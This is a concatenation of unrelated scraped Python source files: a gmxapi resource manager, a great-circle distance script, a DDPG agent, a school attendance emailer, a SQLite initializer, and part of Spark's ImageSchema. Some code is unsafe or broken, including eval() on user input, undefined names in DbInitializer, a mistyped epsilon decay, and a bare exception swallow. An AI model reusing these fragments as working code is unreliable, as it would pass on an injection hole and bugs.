def __publishing_context(self):
"""Get a context manager for resolving the data dependencies of this node.
The returned object is a Python context manager (used to open a `with` block)
to define the scope in which the operation's output can be published.
'output' type resources can be published exactly once, and only while the
publishing context is active. (See operation.function_wrapper())
Used internally to implement ResourceManager.publishing_resources()
Responsibilities of the context manager are to:
* (TODO) Make sure dependencies are resolved.
* Make sure outputs are marked 'done' when leaving the context.
"""
# TODO:
# if self._data.done():
# raise exceptions.ProtocolError('Resources have already been published.')
resource = PublishingDataProxy(weakref.proxy(self))
# ref: https://docs.python.org/3/library/contextlib.html#contextlib.contextmanager
try:
yield resource
except Exception as e:
message = 'Uncaught exception while providing output-publishing resources for {}.'.format(self._runner)
raise exceptions.ApiError(message) from e
finally:
self.done = True
def __init__(self, input_fingerprint=None, runner=None):
"""Initialize a resource manager for the inputs and outputs of an operation.
Arguments:
runner : callable to be called once to set output data
input_fingerprint : Uniquely identifiable input data description
"""
assert callable(runner)
assert input_fingerprint is not None
# Note: This implementation assumes there is one ResourceManager instance per data source,
# so we only stash the inputs and dependency information for a single set of resources.
# TODO: validate input_fingerprint as its interface becomes clear.
self._input_fingerprint = input_fingerprint
self._data = {name: Output(name=name, dtype=dtype, done=False, data=None)
for name, dtype in output.items()}
# TODO: reimplement as a data descriptor
# so that Publisher does not need a bound circular reference.
self._publisher = PublishingDataProxy(weakref.proxy(self))
self.__publishing_resources = [self.__publishing_context()]
self.done = False
self._runner = runner
self.__operation_entrance_counter = 0
def set_result(self, name, value):
if type(value) == list:
for item in value:
# In this specification, it is antithetical to publish Futures.
assert not hasattr(item, 'result')
self._data[name] = Output(name=name,
dtype=self._data[name].dtype,
done=True,
data=self._data[name].dtype(value))
def update_output(self):
"""Bring the output of the bound operation up to date.
Execute the bound operation once if and only if it has not
yet been run in the lifetime of this resource manager.
Used internally to implement Futures for the local operation
associated with this resource manager.
TODO: We need a different implementation for an operation whose output
is served by multiple resource managers. E.g. an operation whose output
is available across the ensemble, but which should only be executed on
a single ensemble member.
"""
# This code is not intended to be reentrant. We make a modest attempt to
# catch unexpected reentrance, but this is not (yet) intended to be a thread-safe
# resource manager implementation.
if not self.done:
self.__operation_entrance_counter += 1
if self.__operation_entrance_counter > 1:
raise exceptions.ProtocolError('Bug detected: resource manager tried to execute operation twice.')
if not self.done:
with self.local_input() as input:
# Note: Resources are marked "done" by the resource manager
# when the following context manager completes.
# TODO: Allow both structured and singular output.
# For simple functions, just capture and publish the return value.
with self.publishing_resources() as output:
self._runner(*input.args, output=output, **input.kwargs)
def future(self, name: str = None, dtype=None):
"""Retrieve a Future for a named output.
TODO: (FR5+) Normalize this part of the interface between operation definitions and
resource managers.
"""
if not isinstance(name, str) or name not in self._data:
raise exceptions.ValueError('"name" argument must name an output.')
assert dtype is not None
if dtype != self._data[name].dtype:
message = 'Requested Future of type {} is not compatible with available type {}.'
message = message.format(dtype, self._data[name].dtype)
raise exceptions.ApiError(message)
return Future(self, name, dtype)
def data(self):
"""Get an adapter to the output resources to access results."""
return OutputDataProxy(self)
@contextmanager
def local_input(self):
"""In an API session, get a handle to fully resolved locally available input data.
Execution dependencies are resolved on creation of the context manager. Input data
becomes available in the ``as`` object when entering the context manager, which
becomes invalid after exiting the context manager. Resources allocated to hold the
input data may be released when exiting the context manager.
It is left as an implementation detail whether the context manager is reusable and
under what circumstances one may be obtained.
"""
# Localize data
for dependency in self._dependencies:
dependency()
# TODO: (FR3+) be more rigorous.
# This should probably also use a sort of Context-based observer pattern rather than
# the result() method, which is explicitly for moving data across the API boundary.
args = []
try:
for arg in self._input_fingerprint.args:
if hasattr(arg, 'result'):
args.append(arg.result())
else:
args.append(arg)
except Exception as E:
raise exceptions.ApiError('input_fingerprint not iterating on "args" attr as expected.') from E
kwargs = {}
try:
for key, value in self._input_fingerprint.kwargs.items():
if hasattr(value, 'result'):
kwargs[key] = value.result()
else:
kwargs[key] = value
if isinstance(kwargs[key], list):
new_list = []
for item in kwargs[key]:
if hasattr(item, 'result'):
new_list.append(item.result())
else:
new_list.append(item)
kwargs[key] = new_list
try:
for item in kwargs[key]:
# TODO: This should not happen. Need proper tools for NDArray Futures.
# assert not hasattr(item, 'result')
if hasattr(item, 'result'):
kwargs[key][item] = item.result()
except TypeError:
# This is only a test for iterables
pass
except Exception as E:
raise exceptions.ApiError('input_fingerprint not iterating on "kwargs" attr as expected.') from E
assert 'input' not in kwargs
for key, value in kwargs.items():
if key == 'command':
if type(value) == list:
for item in value:
assert not hasattr(item, 'result')
input_pack = collections.namedtuple('InputPack', ('args', 'kwargs'))(args, kwargs)
# Prepare input data structure
yield input_pack
def publishing_resources(self):
"""Get a context manager for resolving the data dependencies of this node.
Use the returned object as a Python context manager.
'output' type resources can be published exactly once, and only while the
publishing context is active.
Write access to publishing resources can be granted exactly once during the
resource manager lifetime and conveys exclusive access.
"""
return self.__publishing_resources.pop()
###
# TODO: Need a facility to resolve inputs, chasing dependencies...
###
@property
def _dependencies(self):
"""Generate a sequence of call-backs that notify of the need to satisfy dependencies."""
for arg in self._input_fingerprint.args:
if hasattr(arg, 'result') and callable(arg.result):
yield arg.result
for _, arg in self._input_fingerprint.kwargs.items():
if hasattr(arg, 'result') and callable(arg.result):
yield arg.result
for item in self._input_fingerprint.dependencies:
assert hasattr(item, 'run')
yield item.run
def decorator(function):
@functools.wraps(function)
def factory(**kwargs):
def get_resource_manager(instance):
"""Provide a reference to a resource manager for the dynamically defined Operation.
Initial Operation implementation must own ResourceManager. As more formal Context is
developed, this can be changed to a weak reference. A distinction can also be developed
between the facet of the Context-level resource manager to which the Operation has access
and the whole of the managed resources.
"""
return ResourceManager(input_fingerprint=instance._input, runner=function)
class Operation(object):
"""Dynamically defined Operation implementation.
Define a gmxapi Operation for the functionality being wrapped by the enclosing code.
"""
signature = inspect.signature(function)
def __init__(self, **kwargs):
"""Initialization defines the unique input requirements of a work graph node.
Initialization parameters map to the parameters of the wrapped function with
addition(s) to support gmxapi data flow and deferred execution.
If provided, an ``input`` keyword argument is interpreted as a parameter pack
of base input. Inputs also present as standalone keyword arguments override
values in ``input``.
Inputs that are handles to gmxapi operations or outputs induce data flow
dependencies that the framework promises to satisfy before the Operation
executes and produces output.
"""
#
# Define the unique identity and data flow constraints of this work graph node.
#
# TODO: (FR4) generalize
input_dependencies = []
# TODO: Make allowed input strongly specified in the Operation definition.
# TODO: Resolve execution dependencies at run() and make non-data
# execution `dependencies` just another input that takes the default
# output of an operation and doesn't do anything with it.
# If present, kwargs['input'] is treated as an input "pack" providing _default_ values.
input_kwargs = {}
if 'input' in kwargs:
provided_input = kwargs.pop('input')
if provided_input is not None:
# Try to determine what 'input' is.
# TODO: (FR5+) handling should be related to Context.
# The process of accepting input arguments includes resolving placement in
# a work graph and resolving the Context responsibilities for graph nodes.
if hasattr(provided_input, 'run'):
input_dependencies.append(provided_input)
else:
# Assume a parameter pack is provided.
for key, value in provided_input.items():
input_kwargs[key] = value
assert 'input' not in kwargs
assert 'input' not in input_kwargs
# Merge kwargs and kwargs['input'] (keyword parameters versus parameter pack)
for key in kwargs:
if key in self.signature.parameters:
input_kwargs[key] = kwargs[key]
else:
raise exceptions.UsageError('Unexpected keyword argument: {}'.format(key))
# TODO: (FR4) Check input types
self.__input = PyFuncInput(args=[],
kwargs=input_kwargs,
dependencies=input_dependencies)
# TODO: (FR5+) Split the definition of the resource structure
# and the resource initialization.
# Resource structure definition logic can be moved to the level
# of the class definition. We need knowledge of the inputs to
# uniquely identify the resources for this operation instance.
# Implementation suggestion: Context-provided metaclass defines
# resource manager interface for this Operation. Factory function
# initializes compartmentalized resource management at object creation.
self.__resource_manager = get_resource_manager(self)
@property
def _input(self):
"""Internal interface to support data flow and execution management."""
return self.__input
@property
def output(self):
# Note: if we define Operation classes exclusively in the scope
# of Context instances, we could elegantly have a single _resource_manager
# handle instance per Operation type per Context instance.
# That could make it easier to implement library-level optimizations
# for managing hardware resources or data placement for operations
# implemented in the same librarary. That would be well in the future,
# though, and could also be accomplished with other means,
# so here I'm assuming one resource manager handle instance
# per Operation handle instance.
#
# TODO: Allow both structured and singular output.
# Either return self._resource_manager.data or self._resource_manager.data.output
# TODO: We can configure `output` as a data descriptor
# instead of a property so that we can get more information
# from the class attribute before creating an instance.
# The C++ equivalence would probably be a templated free function for examining traits.
return self.__resource_manager.data()
def run(self):
"""Make a single attempt to resolve data flow conditions.
This is a public method, but should not need to be called by users. Instead,
just use the `output` data proxy for result handles, or force data flow to be
resolved with the `result` methods on the result handles.
`run()` may be useful to try to trigger computation (such as for remotely
dispatched work) without retrieving results locally right away.
`run()` is also useful internally as a facade to the Context implementation details
that allow `result()` calls to ask for their data dependencies to be resolved.
Typically, `run()` will cause results to be published to subscribing operations as
they are calculated, so the `run()` hook allows execution dependency to be slightly
decoupled from data dependency, as well as to allow some optimizations or to allow
data flow to be resolved opportunistically. `result()` should not call `run()`
directly, but should cause the resource manager / Context implementation to process
the data flow graph.
In one conception, `run()` can have a return value that supports control flow
by itself being either runnable or not. The idea would be to support
fault tolerance, implementations that require multiple iterations / triggers
to complete, or looping operations.
"""
self.__resource_manager.update_output()
operation = Operation(**kwargs)
return operation
return factory
return decorator
| StarcoderdataPython |
5192514 | # The great circle distance is the distance between
# two points on the surface of a sphere. Let (x1, y1) and (x2, y2) be the geographical
# latitude and longitude of two points. The great circle distance between the two
# points can be computed using the following formula:
# d = radius * arccos(sin(x 1 ) * sin(x 2 ) + cos(x 1 ) * cos(x 2 ) * cos(y 1 - y 2 ))
# ___________________________________________________________________________________________________________
# This program prompts the user to enter the latitude and longitude of two points on the earth in degrees
# and displays its great circle distance.
import math , cmath
x1, y1 = eval(input("Enter point 1 (latitude and longitude) in degrees: "))
x2, y2 = eval(input("Enter point 2 (latitude and longitude) in degrees: "))
x1 = math.radians(x1)
x2 = math.radians(x2)
y1 = math.radians(y1)
y2 = math.radians(y2)
averageRadiusOfEarth = 6371.01
A = math.sin(x1) * math.sin(x2)
B = math.cos(x1) * math.cos(x2)
C = math.cos(y1 - y2)
greatCircleDistance = averageRadiusOfEarth * math.acos(A + B * C)
# 41.5,87.37
print("The distance between the two points is: ", greatCircleDistance, "Km")
| StarcoderdataPython |
1655361 | <reponame>kswann-mck/udacity_drl_p3
"""
This script is the agent implementation of a Deep Deterministic Policy Gradient agent on the Unity Reacher environment. The base model, agent
and training function were taken from the solution here:
https://github.com/udacity/deep-reinforcement-learning/tree/master/ddpg-pendulum.
It was modified to include parameters to make training with different hyperparamter options easier.
"""
import numpy as np
import random
import copy
from collections import namedtuple, deque
from model import Actor, Critic
import torch
import torch.nn.functional as F
import torch.optim as optim
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Agent():
"""Interacts with and learns from the environment."""
def __init__(self,
state_size=33,
action_size=4,
eps_start=1.0,
eps_end=0.01,
eps_decay=0.995,
buffer_size=1e6,
batch_size=256,
update_every=20,
update_times=1,
actor_fc1_units=400,
actor_fc2_units=300,
critic_fc1_units=256,
critic_fc2_units=128,
actor_lr=1e-3,
critic_lr=1e-3,
gamma=0.99,
tau=1e-3,
weight_decay=0,
noise_theta=0.15,
noise_sigma=0.20,
random_seed=2
):
"""Initialize an Agent object.
Parameters
----------
state_size: the size of the state representation vector.
action_size: the size of the action space.
eps_start: float, the starting value of epsilon used to decrease the noise over time
eps_end: float, the minimum value of epsilon
eps_decay: float, the rate at which epsilon decays with subsequent timesteps
buffer_size: the size of the replay experince buffer
batch_size: int, the batch sized used for gradient descent during the learning phase
update_every: int, the interval of episodes at which the learning step occurs
update_times: the number of times to update at each update
actor_fc1_units: int, the number of neurons in the first fully connected layer of the actor neural network
actor_fc2_units: int, the number of neurons in the second fully connected layer of the actor neural network
critic_fc1_units: int, the number of neurons in the first fully connected layer of the critic neural network
critic_fc2_units: int, the number of neurons in the second fully connected layer of the critic neural network
actor_lr: float, the learning rate for gradient descent of the actor network
critic_lr: float, the learning rate for gradient descent of the critic network
gamma: float, the reward discount factor used in updates
tau: float, the interpolation parameter for the soft update
weight_decay: the weight decay rate for the adam optimizer used on the critic network
noise_theta: the theta term on the Ornstein-Uhlenbeck process used to add noise during training
noise_sigma: the sigma term on the Ornstein-Uhlenbeck process used to add noise during training
random_seed: the random seed used for consistency
"""
self.state_size = state_size
self.action_size = action_size
self.eps_start = eps_start
self.eps = self.eps_start
self.eps_decay = eps_decay
self.eps_end = eps_end
self.buffer_size=int(buffer_size)
self.batch_size=int(batch_size)
self.update_every = update_every
self.update_times = update_times
self.gamma = gamma
self.tau = tau
self.t_step = 0
self.noise_mu = 0
self.seed = random.seed(random_seed)
# Actor Network (w/ Target Network)
self.actor_local = Actor(state_size, action_size, random_seed, actor_fc1_units, actor_fc2_units).to(device)
self.actor_target = Actor(state_size, action_size, random_seed, actor_fc1_units, actor_fc2_units).to(device)
self.actor_optimizer = optim.Adam(self.actor_local.parameters(), lr=actor_lr)
# Critic Network (w/ Target Network)
self.critic_local = Critic(state_size, action_size, random_seed, critic_fc1_units, critic_fc2_units).to(device)
self.critic_target = Critic(state_size, action_size, random_seed, critic_fc1_units, critic_fc2_units).to(device)
self.critic_optimizer = optim.Adam(self.critic_local.parameters(), lr=critic_lr, weight_decay=weight_decay)
# Noise process
self.noise = OUNoise(action_size, random_seed, self.noise_mu, noise_theta, noise_sigma)
# Replay memory
self.memory = ReplayBuffer(action_size, random_seed, buffer_size, batch_size)
def step(self, state, action, reward, next_state, done):
"""Save experience in replay memory, and use random sample from buffer to learn."""
# Save experience / reward
self.memory.add(state, action, reward, next_state, done)
self.t_step = (self.t_step + 1) % self.update_every
# Learn, if enough samples are available in memory
if len(self.memory) > self.batch_size and self.t_step == 0:
for i in range(self.update_times):
experiences = self.memory.sample()
self.learn(experiences, self.gamma)
def act(self, state, add_noise=True):
"""Returns actions for given state as per current policy."""
state = torch.from_numpy(state).float().to(device)
self.actor_local.eval()
with torch.no_grad():
action = self.actor_local(state).cpu().data.numpy()
self.actor_local.train()
if add_noise:
# decay noise over time
action += np.max([self.eps, self.eps_end]) * self.noise.sample()
self.epsilon = self.eps*self.eps_decay
return np.clip(action, -1, 1)
def reset(self):
#self.eps = self.eps_start
self.noise.reset()
def learn(self, experiences, gamma):
"""Update policy and value parameters using given batch of experience tuples.
Q_targets = r + γ * critic_target(next_state, actor_target(next_state))
where:
actor_target(state) -> action
critic_target(state, action) -> Q-value
Params
======
experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples
gamma (float): discount factor
"""
states, actions, rewards, next_states, dones = experiences
# ---------------------------- update critic ---------------------------- #
# Get predicted next-state actions and Q values from target models
actions_next = self.actor_target(next_states)
Q_targets_next = self.critic_target(next_states, actions_next)
# Compute Q targets for current states (y_i)
Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))
# Compute critic loss
Q_expected = self.critic_local(states, actions)
critic_loss = F.mse_loss(Q_expected, Q_targets)
# Minimize the loss
self.critic_optimizer.zero_grad()
critic_loss.backward()
torch.nn.utils.clip_grad_norm(self.critic_local.parameters(), 1)
self.critic_optimizer.step()
# ---------------------------- update actor ---------------------------- #
# Compute actor loss
actions_pred = self.actor_local(states)
actor_loss = -self.critic_local(states, actions_pred).mean()
# Minimize the loss
self.actor_optimizer.zero_grad()
actor_loss.backward()
self.actor_optimizer.step()
# ----------------------- update target networks ----------------------- #
self.soft_update(self.critic_local, self.critic_target, self.tau)
self.soft_update(self.actor_local, self.actor_target, self.tau)
def soft_update(self, local_model, target_model, tau):
"""Soft update model parameters.
θ_target = τ*θ_local + (1 - τ)*θ_target
Params
======
local_model: PyTorch model (weights will be copied from)
target_model: PyTorch model (weights will be copied to)
tau (float): interpolation parameter
"""
for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):
target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)
class OUNoise:
"""Ornstein-Uhlenbeck process."""
def __init__(self, size, seed, mu=0., theta=0.15, sigma=0.2):
"""Initialize parameters and noise process."""
self.mu = mu * np.ones(size)
self.theta = theta
self.sigma = sigma
self.seed = random.seed(seed)
self.reset()
def reset(self):
"""Reset the internal state (= noise) to mean (mu)."""
self.state = copy.copy(self.mu)
def sample(self):
"""Update internal state and return it as a noise sample."""
x = self.state
dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])
self.state = x + dx
return self.state
class ReplayBuffer:
"""Fixed-size buffer to store experience tuples."""
def __init__(self, action_size, seed, buffer_size, batch_size):
"""Initialize a ReplayBuffer object.
Params
======
buffer_size (int): maximum size of buffer
batch_size (int): size of each training batch
"""
print(f"Replay Buffer Size: {buffer_size}, Batch Size: {batch_size}")
self.action_size = action_size
self.memory = deque(maxlen=int(buffer_size)) # internal memory (deque)
self.batch_size = batch_size
self.experience = namedtuple("Experience", field_names=["state", "action", "reward", "next_state", "done"])
self.seed = random.seed(seed)
def add(self, state, action, reward, next_state, done):
"""Add a new experience to memory."""
e = self.experience(state, action, reward, next_state, done)
self.memory.append(e)
def sample(self):
"""Randomly sample a batch of experiences from memory."""
experiences = random.sample(self.memory, k=self.batch_size)
states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device)
actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).float().to(device)
rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device)
next_states = torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(device)
dones = torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(device)
return (states, actions, rewards, next_states, dones)
def __len__(self):
"""Return the current size of internal memory."""
return len(self.memory) | StarcoderdataPython |
8138286 | <reponame>tophermckee/python_lca_data
import sys
sys.path.append("..")
from util.utilities import *
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%B-%d-%Y %H:%M:%S',
filename=f"../logs/{Path(__file__).stem}.log",
filemode='w'
)
def send_attendance_discrepancies():
today = datetime.datetime.now().strftime('%Y-%m-%d')
with open('../html/discrepancy_email.html', 'r') as f:
html_email = f.read()
class_absences = sr_api_pull(
'class-absences',
parameters = {
'school_ids': 15,
'min_date': today,
'max_date': today,
'expand': 'absence_type,section_period.period,student,section_period.staff_member,section_period.section.course_definition'
}
)
database = {}
try:
if today_is_a_school_day():
for absence in class_absences:
if absence['student_id'] not in database.keys():
database[absence['student_id']] = {'name': f"{absence['student']['first_name']} {absence['student']['last_name']}", 'period1': {'in_school': '1', 'staffer': '', 'code': 'Present'}, 'pack_time': {'in_school': '1', 'staffer': '', 'code': 'Present'}}
if absence['section_period']['period']['display_name'] == 'PT':
database[absence['student_id']]['pack_time'] = {'code': absence['absence_type']['name'], 'in_school': absence['absence_type']['in_school'], 'staffer': absence['section_period']['staff_member']['display_name']}
if absence['section_period']['period']['display_name'] == 'P1':
database[absence['student_id']]['period1'] = {'code': absence['absence_type']['name'], 'in_school': absence['absence_type']['in_school'], 'staffer': absence['section_period']['staff_member']['display_name']}
table_data = ''
for student in database:
if (database[student]['pack_time']['in_school'] == '1') and(database[student]['period1']['in_school'] == '0'):
table_data += f"<tr><td>{database[student]['name']}</td><td>{database[student]['pack_time']['code']}</td><td>{database[student]['period1']['code']}</td></tr>"
send_email('<EMAIL>', '', f"{today} Attendance Discrepancies", html_email.replace('###table_data###', table_data))
except Exception as error:
pass
if __name__ == '__main__':
send_attendance_discrepancies() | StarcoderdataPython |
1996227 | <reponame>ytyaru0/GitHub.Uploader.Pi3.Https.201802220700
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from abc import ABCMeta, abstractmethod
import os.path
import setting.Setting
# 抽象クラス
class DbInitializer(metaclass=ABCMeta):
def __init__(self):
self.__path_dir_root = os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
self.__setting = setting.Setting.Setting()
self.__path_dir_this = os.path.abspath(os.path.dirname(__file__))
# self.__path_dir_db = self.__setting.DbPath
self.__db = None
def Initialize(self):
db = None
print(self.DbId)
print(self.DbFileName)
# if not os.path.isfile(self.__files[dbname]):
if os.path.isfile(self.DbFilePath):
db = dataset.connect('sqlite:///' + self.DbFilePath)
else:
# 空ファイル作成
with open(self.DbFilePath, 'w') as f: pass
# DB接続
db = dataset.connect('sqlite:///' + self.DbFilePath)
db.query('PRAGMA foreign_keys = false')
# テーブル作成(CreateTable文)
for path_sql in self.__GetCreateTableSqlFilePaths():
self.__ExecuteSqlFile(dbname, path_sql)
# 初期値の挿入(Insert文)
for path_tsv in self.__GetInsertTsvFilePaths():
table_name = os.path.splitext(table_name)[0]
loader = database.TsvLoader.TsvLoader()
loader.ToSqlite3(path_tsv, self.DbFilePath, table_name)
db.query('PRAGMA foreign_keys = true')
return db
#@abstractmethod
def CreateDb(self):
if not os.path.isfile(self.DbFilePath):
with open(self.DbFilePath, 'w') as f: pass
def ConnectDb(self):
self.__class__.Db = dataset.connect('sqlite:///' + self.DbFilePath)
#@abstractmethod
def CreateTable(self):
db.query('PRAGMA foreign_keys = false')
# テーブル作成(CreateTable文)
for path_sql in self.__GetCreateTableSqlFilePaths():
self.__ExecuteSqlFile(dbname, path_sql)
#@abstractmethod
def InsertInitData(self): pass
# 初期値の挿入(Insert文)
for path_tsv in self.__GetInsertTsvFilePaths():
table_name = os.path.splitext(table_name)[0]
loader = database.TsvLoader.TsvLoader()
loader.ToSqlite3(path_tsv, self.DbFilePath, table_name)
db.query('PRAGMA foreign_keys = true')
@property
def DbId(self): return self.__class__.__name__.replace(super().__thisclass__.__name__, '')
@property
def DbFileName(self): return 'GitHub.' + self.DbId + '.sqlite3'
@property
def DbFilePath(self): return os.path.join(self.__setting.DbPath, self.DbFileName)
# パス取得(テーブル作成用SQLファイル)
def __GetCreateTableSqlFilePaths(self):
path = os.path.join(self.__path_dir_this, self.DbId, 'sql', 'create')
for path_sql in glob.glob(os.path.join(path + '*.sql')): yield path_sql
# パス取得(初期値挿入用TSVファイル)
def __GetInsertTsvFilePaths(self, dbname):
path = os.path.join(self.__path_dir_this, self.DbId, 'tsv')
for path_tsv in glob.glob(os.path.join(path + '*.tsv')): yield path_tsv
# SQLファイル発行
def __ExecuteSqlFile(self, dbname, sql_path):
with open(sql_path, 'r') as f:
sql = f.read()
self.__dbs[dbname].query(sql)
"""
# パス取得(テーブル作成用SQLファイル)
def __GetCreateTableSqlFilePaths(self, dbname):
path = os.path.join(self.__path_dir_this, dbname, 'sql', 'create')
for path_sql in glob.glob(os.path.join(path + '*.sql')): yield path_sql
# パス取得(初期値挿入用TSVファイル)
def __GetInsertTsvFilePaths(self, dbname):
path = os.path.join(self.__path_dir_this, dbname, 'tsv')
for path_tsv in glob.glob(os.path.join(path + '*.tsv')): yield path_tsv
return self.__dbs[dbname]
# SQLファイル発行
def __ExecuteSqlFile(self, dbname, sql_path):
with open(sql_path, 'r') as f:
sql = f.read()
self.__dbs[dbname].query(sql)
"""
| StarcoderdataPython |
3394786 | <filename>tests/load_context.py
def load_context():
"""
Add the src dir to sys.path so we can
import code in the test folder as expected
"""
import sys, os
current_path = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, current_path + '/../src')
| StarcoderdataPython |
9727268 | <gh_stars>0
from .collect_env import collect_env
from .logger import get_root_logger
from .statistictext import StatisticTextLoggerHook
from .print_log import print_defect_metrics, print_defect_loss
from .trainer_hooks import CheckRunstateHook, TrainerLogHook, TrainerCheckpointHook
__all__ = ['get_root_logger', 'collect_env',
'CheckRunstateHook', 'TrainerLogHook', 'TrainerCheckpointHook',
'print_defect_metrics', 'print_defect_loss', 'StatisticTextLoggerHook'] | StarcoderdataPython |
4887720 | import os
from sx.utils import get_package_root
from sx.stubs.settings import Settings
class Environment(object):
def __init__(self, location, constants={}):
self.__location = location
self.__constants = constants
self.__data = {}
def __add(self, key, value, prefix):
if prefix is not None:
key = '{}{}'.format(prefix, key)
self.__data[key] = value
def add(self, key, value, prefix=None):
if type(value) == Settings:
if 'key' in value and value.key in self.__constants:
self.__add(key, self.__constants[value.key], prefix)
elif 'default' in value:
self.__add(key, value.default, prefix)
else:
self.__add(key, value, prefix)
def add_port(self, name, settings, prefix=None):
port_key = '{}_PORT'.format(name.upper())
port_value = getattr(settings.application.packages, name).port
self.add(port_key, port_value, prefix)
def __enter__(self):
self.__data = {}
return self
def __exit__(self, *context):
root = get_package_root(self.__location)
environment_path = os.path.join(root, '.env')
with open(environment_path, 'w+') as f:
for key in self.__data:
f.write('{}={}'.format(key, self.__data[key]))
f.write('\n')
| StarcoderdataPython |
1807312 | <reponame>kesavanvt/spark<gh_stars>1000+
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
.. attribute:: ImageSchema
An attribute of this module that contains the instance of :class:`_ImageSchema`.
.. autoclass:: _ImageSchema
:members:
"""
import sys
import numpy as np
from distutils.version import LooseVersion
from pyspark import SparkContext
from pyspark.sql.types import Row, _create_row, _parse_datatype_json_string
from pyspark.sql import SparkSession
__all__ = ["ImageSchema"]
class _ImageSchema(object):
"""
Internal class for `pyspark.ml.image.ImageSchema` attribute. Meant to be private and
not to be instantized. Use `pyspark.ml.image.ImageSchema` attribute to access the
APIs of this class.
"""
def __init__(self):
self._imageSchema = None
self._ocvTypes = None
self._columnSchema = None
self._imageFields = None
self._undefinedImageType = None
@property
def imageSchema(self):
"""
Returns the image schema.
Returns
-------
:class:`StructType`
with a single column of images named "image" (nullable)
and having the same type returned by :meth:`columnSchema`.
.. versionadded:: 2.3.0
"""
if self._imageSchema is None:
ctx = SparkContext._active_spark_context
jschema = ctx._jvm.org.apache.spark.ml.image.ImageSchema.imageSchema()
self._imageSchema = _parse_datatype_json_string(jschema.json())
return self._imageSchema
@property
def ocvTypes(self):
"""
Returns the OpenCV type mapping supported.
Returns
-------
dict
a dictionary containing the OpenCV type mapping supported.
.. versionadded:: 2.3.0
"""
if self._ocvTypes is None:
ctx = SparkContext._active_spark_context
self._ocvTypes = dict(ctx._jvm.org.apache.spark.ml.image.ImageSchema.javaOcvTypes())
return self._ocvTypes
@property
def columnSchema(self):
"""
Returns the schema for the image column.
Returns
-------
:class:`StructType`
a schema for image column,
``struct<origin:string, height:int, width:int, nChannels:int, mode:int, data:binary>``.
.. versionadded:: 2.4.0
"""
if self._columnSchema is None:
ctx = SparkContext._active_spark_context
jschema = ctx._jvm.org.apache.spark.ml.image.ImageSchema.columnSchema()
self._columnSchema = _parse_datatype_json_string(jschema.json())
return self._columnSchema
@property
def imageFields(self):
"""
Returns field names of image columns.
Returns
-------
list
a list of field names.
.. versionadded:: 2.3.0
"""
if self._imageFields is None:
ctx = SparkContext._active_spark_context
self._imageFields = list(ctx._jvm.org.apache.spark.ml.image.ImageSchema.imageFields())
return self._imageFields
@property
def undefinedImageType(self):
"""
Returns the name of undefined image type for the invalid image.
.. versionadded:: 2.3.0
"""
if self._undefinedImageType is None:
ctx = SparkContext._active_spark_context
self._undefinedImageType = \
ctx._jvm.org.apache.spark.ml.image.ImageSchema.undefinedImageType()
return self._undefinedImageType
def toNDArray(self, image):
"""
Converts an image to an array with metadata.
Parameters
----------
image : :class:`Row`
image: A row that contains the image to be converted. It should
have the attributes specified in `ImageSchema.imageSchema`.
Returns
-------
:class:`numpy.ndarray`
that is an image.
.. versionadded:: 2.3.0
"""
if not isinstance(image, Row):
raise TypeError(
"image argument should be pyspark.sql.types.Row; however, "
"it got [%s]." % type(image))
if any(not hasattr(image, f) for f in self.imageFields):
raise ValueError(
"image argument should have attributes specified in "
"ImageSchema.imageSchema [%s]." % ", ".join(self.imageFields))
height = image.height
width = image.width
nChannels = image.nChannels
return np.ndarray(
shape=(height, width, nChannels),
dtype=np.uint8,
buffer=image.data,
strides=(width * nChannels, nChannels, 1))
def toImage(self, array, origin=""):
"""
Converts an array with metadata to a two-dimensional image.
Parameters
----------
array : :class:`numpy.ndarray`
The array to convert to image.
origin : str
Path to the image, optional.
Returns
-------
:class:`Row`
that is a two dimensional image.
.. versionadded:: 2.3.0
"""
if not isinstance(array, np.ndarray):
raise TypeError(
"array argument should be numpy.ndarray; however, it got [%s]." % type(array))
if array.ndim != 3:
raise ValueError("Invalid array shape")
height, width, nChannels = array.shape
ocvTypes = ImageSchema.ocvTypes
if nChannels == 1:
mode = ocvTypes["CV_8UC1"]
elif nChannels == 3:
mode = ocvTypes["CV_8UC3"]
elif nChannels == 4:
mode = ocvTypes["CV_8UC4"]
else:
raise ValueError("Invalid number of channels")
# Running `bytearray(numpy.array([1]))` fails in specific Python versions
# with a specific Numpy version, for example in Python 3.6.0 and NumPy 1.13.3.
# Here, it avoids it by converting it to bytes.
if LooseVersion(np.__version__) >= LooseVersion('1.9'):
data = bytearray(array.astype(dtype=np.uint8).ravel().tobytes())
else:
# Numpy prior to 1.9 don't have `tobytes` method.
data = bytearray(array.astype(dtype=np.uint8).ravel())
# Creating new Row with _create_row(), because Row(name = value, ... )
# orders fields by name, which conflicts with expected schema order
# when the new DataFrame is created by UDF
return _create_row(self.imageFields,
[origin, height, width, nChannels, mode, data])
ImageSchema = _ImageSchema()
# Monkey patch to disallow instantiation of this class.
def _disallow_instance(_):
raise RuntimeError("Creating instance of _ImageSchema class is disallowed.")
_ImageSchema.__init__ = _disallow_instance
def _test():
import doctest
import pyspark.ml.image
